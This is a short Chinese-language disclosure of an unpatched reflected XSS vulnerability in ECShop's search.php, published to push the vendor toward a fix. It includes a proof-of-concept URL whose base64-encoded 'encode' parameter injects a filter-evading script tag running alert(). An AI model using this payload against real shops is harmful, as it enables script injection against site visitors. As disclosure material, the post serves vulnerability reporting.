ecshop XSS漏洞

首发:红科网安
作者:Amxking
漏洞挖掘:Amxking
漏洞页面:url/search.php
针对版本:通杀ECShop

这个漏洞已经发现很久了,期待中的ECShop网店系统 V2.7.1 Release 1228正式版依然没有解决这个问题.他乡说:"为了能够尽快拿到官方补丁,AK公布出来督促下吧!"所以简单公布下这个漏洞!

search.php?encode=YTozOntzOjk6IlBIUFNFU1NJRCI7czozMjoiOGIzODY0MzAyNzBhMWRiNzIwNGM3MDA3OTk2YzZjYmEiO3M6NToiaW50cm8iO3M6NDQ6IjE%2bIj48U2NSaVB0IA0KPmFsZXJ0KDQ3MDExNTE0MTA5Nyk7PC9TY1JpUHQ%2bIjtzOjE4OiJzZWFyY2hfZW5jb2RlX3RpbWUiO2k6MTI2NTA4Mzc0Nzt9

补丁:
官方暂未发布该漏洞补丁!